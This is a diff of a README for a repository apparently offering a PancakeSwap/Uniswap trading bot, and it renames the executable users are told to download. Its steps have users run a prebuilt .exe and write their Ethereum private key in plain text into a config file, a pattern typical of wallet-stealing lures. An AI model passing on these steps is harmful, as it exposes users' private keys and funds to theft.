luuminhphunmg/Pancakeswap-and-uniswap-trading-bot/README.md

 0. Read prerequisites

-1. Download the latest release or download "configfile.py" and "pancakeswap_bot.exe" from the repository.
+1. Download the latest release or download "configfile.py" and "tradingbot.exe" from the repository.

 2. Open "configfile.py" (with notepad for instance) and add your ethereum address and personal key at the bottom of the file between the quotation marks('').